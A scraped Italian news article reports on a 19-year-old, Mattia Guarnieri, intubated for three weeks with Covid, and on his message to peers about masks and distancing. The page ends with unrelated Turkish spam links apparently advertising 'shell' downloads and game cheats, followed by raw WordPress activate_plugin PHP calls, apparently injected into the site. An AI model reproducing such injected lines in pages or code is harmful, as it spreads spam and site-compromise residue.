Coronavirus, la storia di Mattia Guarnieri a Che tempo che fa. “A 19 anni intubato per 3 settimane, questo virus fa male” – Corriere dell’Umbria



A soli 19 anni ha vissuto sulla sua pelle il dramma del Coronavirus. Mattia Guarneri è stato il più giovane intubato per il Covid in Italia e racconterà la sua esperienza in terapia intensiva nel corso di Che tempo che fa, la trasmissione di Fabio Fazio la cui puntata andrà in onda domenica 18 ottobre su Rai3. Poco tempo fa Mattia ha sostenuto l’esame di maturità e già nelle scorse settimane in un video pubblicato sui social ha lanciato un monito ai suoi coetanei per non sottovalutare la malattia e il virus: “Mando questo breve messaggio per far capire ai miei coetanei che se questo virus colpisce veramente può fare davvero male – ha sottolineato -. Vi raccomando di divertirvi mantenendo le norme che ci siamo prefissati da inizio epidemia: la mascherina e il distanziamento sociale”. “A tutti piace divertirsi – ha aggiunto Guarnieri, ma dobbiamo anche salvaguardare la vita delle altre persone”. Poi il diciannovenne ha concluso il suo intervento così: “Sono rimasto intubato per tre settimane – ha spiegato – poi sono stato trasferito in pneumologia dove ho fatto altre due settimane di degenza”. Insomma, un’esperienza terribile dal quale per fortuna è riuscito a riemergere. Ora Mattia Guarnieri racconterà ulteriori dettagli e sensazioni su Rai3 da Fabio Fazio. Appuntamento dalle 20.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Shell İndir Oyun İndir Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );